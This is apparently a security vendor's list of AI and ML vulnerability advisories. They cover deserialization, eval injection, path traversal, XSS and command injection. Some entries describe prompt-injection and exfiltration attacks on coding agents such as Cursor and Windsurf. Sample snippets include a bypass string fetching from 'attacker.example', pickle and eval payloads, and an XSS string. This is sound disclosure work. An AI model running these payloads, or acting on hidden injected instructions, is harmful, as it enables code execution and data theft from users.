HiddenLayer AI Security Advisory

HiddenLayer's AI Security Research team consists of multidisciplinary cybersecurity experts and data scientists dedicated to raising awareness about threats to machine learning and artificial intelligence systems.

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode, Cursor checks commands sent to the terminal against a list of specifically allowed commands. The function that performs this check contains a logic flaw that lets an attacker craft a command that executes commands outside the allowlist.
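
The advisory does not disclose Cursor's exact check, but the general failure mode can be sketched: an allowlist that inspects only part of a command line is defeated by shell metacharacters. The checker below is hypothetical, for illustration only, and is not Cursor's actual code.

```python
import shlex

# Hypothetical allowlist checker (NOT Cursor's actual code): it approves a
# command line if its first token is allowlisted, ignoring the rest.
ALLOWLIST = {"ls", "cat", "echo"}

def naive_is_allowed(command: str) -> bool:
    first_token = shlex.split(command)[0]
    return first_token in ALLOWLIST

# The check passes, but a shell would execute BOTH commands.
payload = "echo hello; curl attacker.example/run.sh"
print(naive_is_allowed(payload))     # True: only 'echo' was inspected
print(naive_is_allowed("rm -rf /"))  # False: 'rm' is not allowlisted
```

A robust checker has to reason about the full command line as the shell would parse it, not just its first token.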

November 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.
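
The underlying flaw is a common one: joining a user-supplied path onto a project root without checking where the result lands. A minimal sketch follows; the paths and helper names are illustrative, not Windsurf's code.

```python
import os

PROJECT_ROOT = "/home/user/project"

def naive_resolve(base: str, user_path: str) -> str:
    # Vulnerable pattern: join and normalize, but never validate the result.
    return os.path.normpath(os.path.join(base, user_path))

def safe_resolve(base: str, user_path: str) -> str:
    resolved = os.path.normpath(os.path.join(base, user_path))
    # Reject any path that escapes the intended directory.
    if os.path.commonpath([resolved, base]) != base:
        raise ValueError("path escapes project root")
    return resolved

# A relative path with enough '..' components walks out of the project.
print(naive_resolve(PROJECT_ROOT, "../../etc/passwd"))  # /home/etc/passwd
```

The safe variant rejects the traversal while still accepting ordinary in-project paths.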

October 2025
SAI-ADV-2025-012

October 17, 2025

Data Exfiltration from Tool-Assisted Setup

Windsurf

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. An attacker can therefore hide instructions in a project file that read sensitive data from the project (such as a .env file) and insert it into web requests for exfiltration.

October 2025
CVE-2025-62356

October 17, 2025

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

Qodo Gen

A symlink bypass vulnerability exists inside of Qodo Gen’s built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths can be found in the file: ai/codium/mcp/ideTools/FileSystem.java, but this validation can be bypassed if a symbolic link exists within the project.
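
Symlink bypasses of this kind follow a common pattern: the validator compares the lexical path against the allowed root, but a symlink planted inside the project resolves elsewhere. A runnable sketch of the pattern (not Qodo Gen's Java code):

```python
import os
import tempfile

root = tempfile.mkdtemp()
project = os.path.join(root, "project")
secrets = os.path.join(root, "secrets")
os.makedirs(project)
os.makedirs(secrets)
with open(os.path.join(secrets, "key.txt"), "w") as f:
    f.write("s3cr3t")

# Attacker plants a symlink inside the allowed project directory.
os.symlink(secrets, os.path.join(project, "docs"))

requested = os.path.join(project, "docs", "key.txt")

# Lexical check: the path *looks* like it is inside the project.
lexical_ok = requested.startswith(project + os.sep)
# Resolved check: following the symlink lands outside the project.
resolved_ok = os.path.realpath(requested).startswith(
    os.path.realpath(project) + os.sep)

print(lexical_ok, resolved_ok)  # True False
```

Validating the fully resolved path (realpath) rather than the lexical one closes the gap.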

October 2025
SAI-ADV-2025-013

October 17, 2025

Data Exfiltration through Web Search Tool

Qodo Gen

The Web Search functionality within the Qodo Gen JetBrains plugin is set up as a built-in MCP server through ai/codium/CustomAgentKt.java. It does not ask user permission when called, meaning that an attacker can enumerate code project files on a victim’s machine and call the Web Search tool to exfiltrate their contents via a request to an external server.

October 2025
CVE-2025-49655

October 17, 2025

Unsafe deserialization function leads to code execution when loading a Keras model

Keras

An arbitrary code execution vulnerability exists in the TorchModuleWrapper class due to its usage of torch.load() within the from_config method. The method deserializes model data with the weights_only parameter set to False, which causes Torch to fall back on Python’s pickle module for deserialization. Since pickle is known to be unsafe and capable of executing arbitrary code during the deserialization process, a maliciously crafted model file could allow an attacker to execute arbitrary commands.
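
The root cause is generic to pickle: any pickled object can name a callable to invoke at load time, which is why torch.load falling back to pickle with weights_only=False is dangerous. A stdlib-only sketch, with print standing in for a harmful call such as os.system:

```python
import pickle

class Payload:
    def __reduce__(self):
        # Executed during unpickling: returns (callable, args). A real attack
        # would use os.system or similar; print is a harmless stand-in.
        return (print, ("arbitrary code ran during deserialization",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # prints the message; no Payload is reconstructed
print(result)                # None: loads() returned print's return value
```

Nothing about the bytes looks suspicious before loading; the code runs as a side effect of deserialization itself.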

October 2025
SAI-ADV-2025-011

July 31, 2025

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

Cursor

When in autorun mode, Cursor checks commands against those that have been specifically blocked or allowed. The function that performs this check has a bypass in its logic that can be exploited by an attacker to craft a command that will be executed regardless of whether or not it is on the block-list or allow-list.

July 2025
CVE-2025-49653

June 9, 2025

Exposure of sensitive information allows account takeover

BackendAI

By default, BackendAI’s agent writes files to /home/config/ when starting an interactive session. These files are readable by the default user and contain sensitive information such as the user’s email address, access key, and session settings.

June 2025
CVE-2025-49652

June 9, 2025

Improper access control allows arbitrary account creation

BackendAI

BackendAI is not intended to allow self-service account creation. However, an exposed endpoint allows anyone to sign up for a user-privileged account.

June 2025
CVE-2025-49651

June 9, 2025

Missing Authorization for Interactive Sessions

BackendAI

Interactive sessions neither authenticate users nor verify that they are authorized. These missing checks allow attackers to take over sessions, access the data they contain (models, code, etc.), alter the data or results, and lock users out of their own sessions.

June 2025
SAI-ADV-2025-001

April 3, 2025

Unsafe Deserialization in DeepSpeed utility function when loading the model file

PyTorch Lightning

If a user converts distributed checkpoints into a single consolidated file using DeepSpeed, a PyTorch file following the naming convention *_optim_states.pt is used. This file returns a state that specifies the model state file, also located in the directory. That file can contain a maliciously crafted data.pkl, which, when deserialized as part of this process, may lead to arbitrary code execution on the system.

April 2025
SAI-ADV-2024-005

December 16, 2024

keras.models.load_model when scanning .pb files leads to arbitrary code execution

Bosch AI

If a user scans a malicious Keras model in the protobuf format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside the Keras model will be executed on the scanning system.

December 2024
SAI-ADV-2024-004

December 16, 2024

keras.models.load_model when scanning .h5 files leads to arbitrary code execution

Bosch AI

If a user scans a malicious Keras model in the H5 format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside the Keras model will be executed on the scanning system.

December 2024
CVE-2024-0129

October 24, 2024

Unsafe extraction of NeMo archive leading to arbitrary file write

NVIDIA NeMo

An attacker can craft a malicious model containing a path traversal and share it with a victim. If the victim uses an Nvidia NeMo version prior to r2.0.0rc0 and loads the malicious model, arbitrary files may be written to disk. This can result in code execution and data tampering.

October 2024
CVE-2024-45858

September 18, 2024

Eval on XML parameters allows arbitrary code execution when loading RAIL file

Guardrails

An attacker can craft an XML file with Python code contained within a ‘validators’ attribute. This code must be wrapped in braces to work, i.e. `{Python_code}`. This can then be passed to a victim user as a Guardrails file, and upon loading it, the Python code contained within the braces is passed into an eval function, which will execute the Python code contained within.

September 2024
CVE-2024-45856

September 12, 2024

Web UI renders JavaScript code in ML Engine name leading to XSS

MindsDB

An attacker authenticated to a MindsDB instance can create an ML Engine, database, project, or uploaded dataset within the UI and give it a name (or a value in the dataset) containing JavaScript code that will render when the items are enumerated within the UI.

September 2024
CVE-2024-45855

September 12, 2024

Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘finetune’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

September 2024
CVE-2024-45854

September 12, 2024

Pickle Load on inhouse BYOM model describe query leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘describe’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

September 2024
CVE-2024-45853

September 12, 2024

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘predict’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse’.

September 2024
CVE-2024-45852

September 12, 2024

Pickle Load on BYOM model load leads to arbitrary code execution

MindsDB

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via a ‘predict’ or ‘describe’ query, executing the arbitrary code on the server.

September 2024
CVE-2024-45851

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration list item creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list item, where the value given for the ‘fields’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.
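
The pattern described in these MindsDB advisories, using eval to parse Python literals out of query values, can be contrasted with ast.literal_eval, which accepts the same literals but refuses to execute expressions. A minimal sketch:

```python
import ast

benign = "{'title': 'Q3 report', 'priority': 2}"
# Both calls parse the dict literal identically...
assert eval(benign) == ast.literal_eval(benign)

# ...but eval also runs arbitrary expressions. getcwd stands in for a
# harmful call an attacker could smuggle into a query parameter.
malicious = "__import__('os').getcwd()"
eval(malicious)  # executes attacker-controlled code

try:
    ast.literal_eval(malicious)
except ValueError:
    print("literal_eval rejected the non-literal payload")
```

Swapping eval for ast.literal_eval preserves the intended "parse a Python data type" behavior while eliminating the code-execution path.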

September 2024
CVE-2024-45850

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration site column creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a site column, where the value given for the ‘text’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45849

September 12, 2024

Eval on query parameters allows arbitrary code execution in SharePoint integration list creation

MindsDB

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list, where the value given for the ‘list’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45848

September 12, 2024

Eval on query parameters allows arbitrary code execution in ChromaDB integration

MindsDB

An attacker authenticated to a MindsDB instance with the ChromaDB integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the ChromaDB engine and running an ‘INSERT’ query against it, where the value given for ‘metadata’ would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

September 2024
CVE-2024-45847

September 12, 2024

Eval on query parameters allows arbitrary code execution in Vector Database integrations

MindsDB

An attacker authenticated to a MindsDB instance with any one of several integrations installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the specified integration engine and running an ‘UPDATE’ query against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run any arbitrary Python code contained within the value given in the ‘SET embeddings =’ part of the query.

September 2024
CVE-2024-45846

September 12, 2024

Eval on query parameters allows arbitrary code execution in Weaviate integration

MindsDB

An attacker authenticated to a MindsDB instance with the Weaviate integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the Weaviate engine and running a ‘SELECT WHERE’ clause against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input, but it will run any arbitrary Python code contained within the value given in the ‘WHERE embeddings =’ part of the clause.

September 2024
CVE-2024-45857

September 12, 2024

Unsafe deserialization in Datalab leads to arbitrary code execution

Cleanlab

An attacker can place a malicious file called datalabs.pkl within a directory and send that directory to a victim user. When the victim user loads the directory with Datalabs.load, the datalabs.pkl within it is deserialized and any arbitrary code contained within it is executed.

September 2024
CVE-2024-27321

September 12, 2024

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

Autolabel

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets, i.e. [], to work. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a multilabel classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which executes the Python code contained within.

September 2024
CVE-2024-27320

September 12, 2024

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

Autolabel

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets, i.e. [], to work. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which executes the Python code contained within.

September 2024
SAI-ADV-2024-003

August 30, 2024

Safe_eval and safe_exec allows for arbitrary code execution

LlamaIndex

Execution of arbitrary code can be achieved via the safe_eval and safe_exec functions of the llama-index-experimental/llama_index/experimental/exec_utils.py Python file. The functions allow the user to run untrusted code via an eval or exec call while only permitting allowlisted functions. However, an attacker can leverage the allowlisted pandas.read_pickle function, or other third-party library functions, to achieve arbitrary code execution. This can be exploited in the Pandas Query Engine.

August 2024
SAI-ADV-2024-002

August 30, 2024

Exec on untrusted LLM output leading to arbitrary code execution on Evaporate integration

LlamaIndex

The safe_eval and safe_exec functions are intended to let the user run untrusted code in an eval or exec call while disallowing dangerous functions. However, an attacker can use third-party library functions to achieve arbitrary code execution.

August 2024
CVE-2024-37066

July 19, 2024

Crafted Wi-Fi network name (SSID) leads to arbitrary command injection

Wyze Cam V4

A command injection vulnerability exists in Wyze Cam V4 firmware versions up to and including 4.52.4.9887. An attacker within Bluetooth range of the camera can leverage this vulnerability to execute arbitrary commands as root during the camera setup process.

July 2024
SAI-ADV-2024-001

July 11, 2024

Deserialization of untrusted data leading to arbitrary code execution

Tensorflow Probability

Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.

July 2024
CVE-2024-37053

June 4, 2024

Pickle Load on Sklearn Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37058

June 4, 2024

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

MLflow

A deserialization vulnerability exists in the _load_from_pickle function of the mlflow/langchain/utils.py file. An attacker can inject a malicious pickle object during the process of creating a Langchain model and log the model to the MLflow tracking server via the API using the mlflow.langchain.log_model function. When a victim user calls the mlflow.langchain.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37061

June 4, 2024

Remote Code Execution on Local System via MLproject YAML File

MLflow

An attacker can package an MLflow Project in which the main entrypoint command set in the MLproject file contains malicious code (or an operating-system-appropriate command), and share it with a victim. When the victim runs the project, the command will be executed on their system.

June 2024
CVE-2024-37060

June 4, 2024

Pickle Load on Recipe Run Leading to Code Execution

MLflow

An attacker can create an MLProject Recipe containing a malicious pickle file and a Python file that calls BaseCard.load on it and share it with a victim. When the victim runs mlflow run against the Recipe directory, the pickle file will be deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37059

June 4, 2024

Cloudpickle Load on PyTorch Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a PyTorch model file and log it to the MLflow tracking server via the API using the mlflow.pytorch.log_model function. When a victim user calls the mlflow.pytorch.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37057

June 4, 2024

Cloudpickle Load on TensorFlow Keras Model Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a TensorFlow model file and log it to the MLflow tracking server via the API using the mlflow.tensorflow.log_model function. When a victim user calls the mlflow.tensorflow.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37056

June 4, 2024

Cloudpickle Load on LightGBM SciKit Learn Model Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a LightGBM scikit-learn model file and log it to the MLflow tracking server via the API using the mlflow.lightgbm.log_model function. When a victim user calls the mlflow.lightgbm.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37055

June 4, 2024

Pickle Load on Pmdarima Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a pmdarima model file and log it to the MLflow tracking server via the API using the mlflow.pmdarima.log_model function. When a victim user calls the mlflow.pmdarima.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37054

June 4, 2024

Cloudpickle Load on PyFunc Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a model file and log it to the MLflow tracking server via the API using the mlflow.pyfunc.log_model function. When a victim user calls the mlflow.pyfunc.load_model function on the model, the pickle object is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37052

June 4, 2024

Cloudpickle Load on Sklearn Model Load Leading to Code Execution

MLflow

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

June 2024
CVE-2024-37064

June 4, 2024

Pickle Load in Read Pandas Utility Function

YData-profiling

An attacker can create a maliciously crafted pandas dataset and share it with a victim. Once a victim loads the dataset in Ydata-profiling, malicious code will execute on their system.

June 2024
CVE-2024-37063

June 4, 2024

XSS Injection in HTML Profile Report Generation

YData-profiling

An attacker can create a maliciously crafted Ydata-profiling html report containing malicious code. Once a victim browses to the report and views it, malicious code will execute in their browser.

June 2024
CVE-2024-37062

June 4, 2024

Pickle Load in Serialized Profile Load

YData-profiling

An attacker can create a maliciously crafted Ydata-profiling report containing malicious code and share it with a victim. When the victim loads the report, the code will be executed on their system.

June 2024
CVE-2024-37065

June 4, 2024

Model Deserialization Leads to Code Execution

Skops

An attacker can create a maliciously crafted model containing an OperatorFuncNode and share it with a victim. If the victim is using Python 3.11 or later and loads the malicious model, arbitrary code will execute on their system.

June 2024
CVE-2024-34073

April 30, 2024

Command Injection in CaptureDependency Function

AWS Sagemaker

A command injection vulnerability exists inside the capture_dependencies function of the AWS SageMaker SDK’s utility file. If a user’s code calls this utility function, an attacker can run arbitrary commands on the system by injecting a system command into the string passed to the function.
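
Command injection of this kind arises when untrusted text is interpolated into a shell command string. The sketch below is hypothetical (echo stands in for the real command the utility would run); passing an argument list without shell=True avoids the problem.

```python
import subprocess

def vulnerable_install(package: str) -> str:
    # Vulnerable: shell=True on an interpolated string lets metacharacters
    # in `package` introduce extra commands.
    cmd = f"echo installing {package}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout

def safe_install(package: str) -> str:
    # Safe: arguments are passed as a list; no shell interprets them.
    proc = subprocess.run(["echo", "installing", package],
                          capture_output=True, text=True)
    return proc.stdout

print(vulnerable_install("requests"))                 # installing requests
print(vulnerable_install("requests; echo INJECTED"))  # INJECTED runs too
```

With the list form, the entire attacker string becomes a single inert argument instead of a second command.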

April 2024
CVE-2024-34072

April 30, 2024

Pickle Load in NumpyDeserializer Leading to Code Execution

AWS Sagemaker

An attacker can inject a malicious pickle object into a numpy file and share it with a victim user. When the victim loads it with the NumpyDeserializer.deserialize function of the base_deserializers Python file, the allow_pickle optional argument is passed to np.load; set to false, the file is loaded safely. By default, however, the parameter was set to true, so unless the victim specifically changed it, the malicious pickle object was loaded and executed.

April 2024
CVE-2024-27322

April 1, 2024

R-bitrary Code Execution Through Deserialization Vulnerability

R

An attacker could leverage the R Data Serialization format to insert arbitrary code into an RDS-formatted file, or into an R package as an RDX or RDB component, which will be executed when referenced or called with readRDS. This is due to the lazy evaluation process used in R’s unserialize function.

April 2024
CVE-2024-27319

February 23, 2024

Out of bounds read due to lack of string termination in assert

ONNX

An attacker can create a malicious ONNX model that fails an assert statement in such a way that an error string of 2048 or more characters is printed, and share it with a victim. When the victim tries to load the model, the resulting string leaks program memory.

February 2024
CVE-2024-27318

February 23, 2024

Path sanitization bypass leading to arbitrary read

ONNX

An attacker can create a malicious ONNX model containing paths to externally located tensors and share it with a victim. When the victim loads the external tensors, a directory traversal can occur, enabling an arbitrary read on the victim’s system and resulting in information disclosure.

February 2024
CVE-2024-24594

February 6, 2024

Web Server Renders User HTML Leading to XSS

ClearML

An attacker can provide a URL rather than uploading an image to the Debug Samples tab of an Experiment. If the URL has the extension .html, the web server retrieves the HTML page, which is assumed to contain trusted data. The HTML is marked as safe and rendered on the page, resulting in arbitrary JavaScript running in any user’s browser when they view the samples tab.
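
The defense against this class of bug is to escape user-controlled markup before rendering rather than marking it safe. A minimal illustration with Python's stdlib (the payload is a generic XSS example, not the one used against ClearML):

```python
import html

user_supplied = '<img src=x onerror="alert(document.cookie)">'

escaped = html.escape(user_supplied)
print(escaped)
# &lt;img src=x onerror=&quot;alert(document.cookie)&quot;&gt;
# A browser renders this as inert text instead of executing the handler.
```

Escaping must happen at output time, in the template layer, so that no fetched or stored content is ever inserted into the page as raw HTML.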

February 2024
CVE-2024-24593

February 6, 2024

Cross-Site Request Forgery in ClearML Server

ClearML

An attacker can craft a malicious web page that triggers a CSRF request when visited. When a user browses to the page, a request is sent that can allow the attacker to fully compromise the user’s account.

February 2024
CVE-2024-24592

February 6, 2024

Improper Auth Leading to Arbitrary Read-Write Access

ClearML

An attacker can, due to lack of authentication, arbitrarily upload, delete, modify, or download files on the fileserver, even if the files belong to another user.

February 2024
CVE-2024-24591

February 6, 2024

Path Traversal on File Download

ClearML

An attacker can upload or modify a dataset containing a link pointing to an arbitrary file and a target file path. When a user interacts with this dataset, such as when using the Dataset.squash method, the file is written to the target path on the user’s system.

February 2024
CVE-2024-24590

February 6, 2024

Pickle Load on Artifact Get

ClearML

An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a Project via the API. When a victim user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.

February 2024
CVE-2024-24595

February 1, 2024

Credentials Stored in Plaintext in MongoDB Instance

ClearML

An attacker could retrieve ClearML user information and credentials using a tool such as mongosh if they have access to the server. This is because the open-source version of the ClearML Server MongoDB instance lacks access control and stores user information and credentials in plaintext.

February 2024
